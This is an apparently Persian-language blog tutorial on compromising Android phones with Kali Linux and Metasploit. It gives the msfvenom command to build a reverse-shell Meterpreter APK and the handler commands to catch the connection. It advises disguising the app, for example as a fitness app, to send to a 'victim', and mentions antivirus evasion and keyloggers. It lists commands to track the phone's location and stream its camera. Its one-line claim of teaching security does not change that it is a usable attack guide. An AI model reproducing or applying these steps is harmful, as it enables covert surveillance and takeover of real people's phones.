سلام
دوستان تو ایـــن پست در مورد  نفوذ به سیستم عامل ویندوز نکته ای رو اموزش دادم
این مطلب در ادامه همون و با استفاده از ابزارهای کالی لینوکس پلفرم محبوب هکرها میخام نحوه نفوذ به گوشی اندرویدی رو اموزش بدوم
هدف ارتقا دانش امنیت در فضای سایبری هست هر چند این نوع اموزشها صرف اموزش پایه هست و پارامترهای زیادی با موضوع اصلی فاصله هست
پس ازمطالعه این اموزش میتونید تست نفوذ رو انجام بدید سیستم من کالی لینوکس رو ماشین مجازی نصب شده ولی اصولش اینه لایو(live) باشه یعنی کالی بعنوان سیستم اصلی نصب بشه عمده ترین تفاوت در تنظیمات شبکه و سرعت انجام کار هست

من فرض میکنم شما آموزشهای لینوکس کالی را برای مبتدیان خواندید. در لینوکس کالی، ابزار شناخته شده به عنوان Metasploit وجود دارد
Metasploit چارچوبی است که در اون هر نوع ابزار تست موجود است. شما می توانید هر چیزی مانند کامپیوتر، سرور، -، و غیره هک کنید. اگر شما مبتدی باشید، آموزش Metasploit رو میتونید در گوگل جستجو کنید در سایتهای داخلی هم توضیح زیاده
بصورت خلاصه متاسپلویت چارچوبی برای تست نفوذ هست 
من مراحلی که در انجام تست نفوذ انجام دادم رو بصورت مرحله به مرحله اسکرین شات تهیه کردم بصورت ترتیبی با توضیح میزارم
خب وقتی وارد محیط کالی شدید ترمینال لینوکس رو باز کنید
در ترمینال برای گرفتن ای پی این درستور رو وارد کنید

ifconfig


دستور msfvenom توضیح کوچیک
Msfvenom یک نمونه خط فرمان از Metasploit است که برای تولید و خروجی انواع مختلف کد های پوسته موجود در Metasploit استفاده می شود
خب ابتدا ای پی لینوکس رو با دستور بالا میگیریم 
سپس در قدم اول یه فایل apk برای نصب در سیستم قربانی تهیه میکنیم فقط با یک خط

msfvenom -p android/meterpreter/reverse_tcp LPORT=192.168.199.137 LPORT=4444 -R> anyname.apk

خب پس از نوشتن دستور بالا با زدن اینتر یه فایل اندرویدی با نام دلخواه در پوشه home ایجاد میشه میتونید میسر هم بهش بدید اما اینجا وارد جزیییات نمیشیم
فایل ایجاد شده رو به یه هاستی اپلود کنید و یا به نحوی از طریق تلگرام و یا واتس اپ به گوشی خودتون بفرستید 
در حین نصب مانند شکل زیر


دسترسی های زیادی میگیره تقریبا همه دسترسی ها رو میگیره و در حین نصب اگه اندروید بالای 4 باشه اخطار ویروس میده --خب یه توضیح
توی سی شارپ وقتی یه کی لاگر مینویسم خیلی شده در لحظه اجرا همون بیت دفندر ویندوز بهش گیر داده و پاکش کرده اما اگه کد نویس کدنویس باشه میتونه کاری کنه انتی ویروس اصلا بهش گیر نده--
خب اینم همینطوره میتونید با اضافه کردن پارامترهای ساخت برنامه اندرویدی از این کار جلوگیری کنید این بحث گسترده است--
توضیح مختصر
در payload من reverse_tcp دارم چون تمام قوانین فایروال را حذف می کند و فایر وال رو دور میزنه بهمون خاطر انتی ویروس بهش گیر میده
LHOST: آدرس IP لوکال شماست  اطمینان حاصل کنید که هدف تلفن همراه شما از همان شبکه استفاده می کند. بعدا، به شما خواهم گفت که چگونه گوشی های اندرویدی که خارج از شبکه شما هستند را هک کنید.
LPORT: برای انتخاب شماره پورت من 4444 را انتخاب کرده ام زیرا رایگان است. شما می توانید هر کسی را انتخاب کنید، اما در مورد خاص، من شما را توصیه انتخاب 443. این شماره پورت برای https است
خب دوبره برمیگیردیم به صفحه کنسول یا ترمینال لینوکس
در محیط ترمینال این دستور رو میزنید
شروع اکسپولیت


use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

تنظیم ای پی و پورت همه کدها رو یکجا بعدا نشون میدم

set LHOST 192.168.199.137
set LPORT 4444
run

الان سیستم در حالت اماده باش قرار داره تا با باز شدن برنامه به گوشی متصل بشه
این تصویر کل عملیات هست
میتونید در قالب یه برنامه بدنسازی یا هر اسمی به قربانی بفرستید





الان قربای با باز کردن برنامه عین دستورات زیر در کنسول یا همون ترمینال درج میشه و دسترسی به گوشی ازاد میشه



چند دستور ساده

wlan_geolocate

مکانیابی گوشی قربانی

webcam_stream
یه مرورگر باز میکنه و دوربین رو هم روشن میکنه

برای ادامه با زدن دستور help گزینه همه دستورات مربوط به اندروید و نحوه کارکردن با ارسال و دریافت فایل نمایش داده میشه
خوب برای هک افراد خارج از شبکه شما باید port forward انجام بدید اونم یه اموزش مجزاست تقریبا زمانش هم زیاده لینک میدم بعدا وقت کردم میگم
یادتون نره مودم شما باید قابلیت پورت فورواردینگ رو داشته باشه

ایــــــن لینک رو ببنید